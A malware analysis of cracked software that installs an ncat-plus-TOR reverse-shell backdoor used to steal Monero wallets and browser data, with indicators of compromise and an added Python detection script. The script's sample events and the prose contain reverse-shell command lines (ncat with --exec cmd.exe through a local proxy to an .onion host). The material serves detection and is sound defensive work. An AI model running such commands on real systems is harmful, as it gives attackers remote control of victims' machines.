From Cracks to Empty Wallets – How Popular Cracks Lead to Digital Currency and Data Theft
For about three years, hackers have been stealing cryptocurrency from victims’ Monero wallets using powerful malware delivered through software cracks for popular apps.
Cracks and patches have been around since the advent of commercial software. Easy to use and widely available on specialized sharing websites, these small apps let people bypass commercial protections in popular software and use applications without paying for them. However, besides the legal implications of unauthorized software use, the cyber-security risks are serious.
Bitdefender analysts have recently uncovered a series of attacks that leverage office tools and image-editing software cracks to compromise computers, hijack crypto-currency wallets and exfiltrate information via the TOR network.
Once executed, the crack drops an instance of ncat.exe (a legitimate tool to send raw data over the network) as well as a TOR proxy. The Netcat and TOR proxy files are dropped on disk as `%syswow64%\ndc.exe` and `%syswow64%\tarsrv.exe`, respectively. Additionally, a batch file is dropped at `%syswow64%\chknap.bat` (for nap.exe) and `%syswow64%\nddcf.cmd` (for ndc.exe) that contains the command line for the Ncat component, which cycles through ports 8000 to 9000 on a .onion domain, as shown in the screenshot below.
The tools work together to create a powerful backdoor that communicates through TOR with its command and control center: the ncat binary uses the listening port of the TOR proxy (`--proxy 127.0.0.1:9075`) and uses the standard `--exec` parameter, which allows all input from the client to be sent to the application and responses to be sent back to the client over the socket (reverse shell behavior).
The crack creates persistence mechanisms for the TOR proxy file and the Ncat binary on the machine with a service and a scheduled task that runs every 45 minutes, respectively. Our investigation reveals that – most likely – the backdoor is being used interactively by a human operator rather than sending automated requests to the victims. Some of the actions we observed are:
- File exfiltration. Ncat can receive local files to send over TOR to the command and control centers.
- BitTorrent client execution. We believe attackers are using BitTorrent clients to exfiltrate data.
- Turning off the firewall in preparation for data exfiltration.
- Theft of Firefox browser profile data (history, credentials and session cookies). Before exfiltration, attackers archive the profile folder with 7zip to generate one file that contains everything.
- Theft of the Monero wallet via the legitimate CLI client.
This list of actions is non-exhaustive, as attackers have complete control of the system and can adapt campaigns based on their current interests.
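One way to hunt for the behavior described above in process-creation logs, as an added example that is not part of the Bitdefender report: it raises an alert when a command line combines Ncat's `--proxy` on a loopback address with an exec option, and marks weaker matches such as the dropped file names for review. The regular expressions, the `triage` levels and the sample events are assumptions constructed for illustration.

```python
import re

# File names the article lists as dropped into the Windows system directories.
DROPPED_NAMES = {"ncat.exe", "ndc.exe", "tarsrv.exe", "chknap.bat", "nddcf.cmd"}
SYSTEM_DIR = re.compile(r'\\windows\\(?:system32|syswow64)\\([^\\"\s]+)', re.I)
# Ncat pointed at a proxy on the local machine (the article shows 127.0.0.1:9075).
LOOPBACK_PROXY = re.compile(r"--proxy[ =]+(?:127\.0\.0\.1|localhost):\d+", re.I)
# Ncat options that attach a program to the socket.
EXEC_FLAG = re.compile(r"(?<!\S)(?:--exec|-e|--sh-exec|-c)(?=[ =])")
ONION_HOST = re.compile(r"\b[a-z2-7]{16,56}\.onion\b", re.I)


def match_reasons(cmdline):
    """Return every indicator from the article that this command line matches."""
    reasons = []
    for name in SYSTEM_DIR.findall(cmdline):
        if name.lower() in DROPPED_NAMES:
            reasons.append("dropped-file:" + name.lower())
    if LOOPBACK_PROXY.search(cmdline):
        reasons.append("loopback-proxy")
    if EXEC_FLAG.search(cmdline):
        reasons.append("exec-flag")
    if ONION_HOST.search(cmdline):
        reasons.append("onion-destination")
    return reasons


def triage(cmdline):
    """alert: shell tunnelled through a local proxy; review: weaker match; ok: nothing."""
    reasons = set(match_reasons(cmdline))
    if {"loopback-proxy", "exec-flag"} <= reasons:
        return "alert"  # behaviour matches even if the binary was renamed
    return "review" if reasons else "ok"


# Constructed process-creation command lines (not taken from the report).
SAMPLE_EVENTS = [
    r"C:\Windows\SysWOW64\ndc.exe --proxy 127.0.0.1:9075 --exec cmd.exe constructedplaceholderaddr.onion 8000",
    r"C:\ProgramData\upd.exe --proxy 127.0.0.1:9075 -e cmd.exe constructedplaceholderaddr.onion 8421",
    r"C:\Windows\SysWOW64\tarsrv.exe",
    r"C:\Tools\ncat.exe --proxy 127.0.0.1:8080 example.org 443",
    r"C:\Windows\System32\svchost.exe -k netsvcs -p",
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(triage(event), match_reasons(event), event, sep=" | ")
```

The second sample event shows why the behavioral match matters: a renamed binary outside the system directories still triggers an alert, while the file-name check alone would miss it.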
Indicators of Compromise
- %SYSWOW64%\ncat.exe
- %SYSWOW64%\ndc.exe
- %SYSWOW64%\chknap.bat
- %SYSWOW64%\nddcf.cmd
- %SYSWOW64%\tarsrv.exe
- %SYSTEM32%\ncat.exe
- %SYSTEM32%\ndc.exe
- %SYSTEM32%\tarsrv.exe
- %SYSTEM32%\nddcf.cmd
Ncat-executing batch file: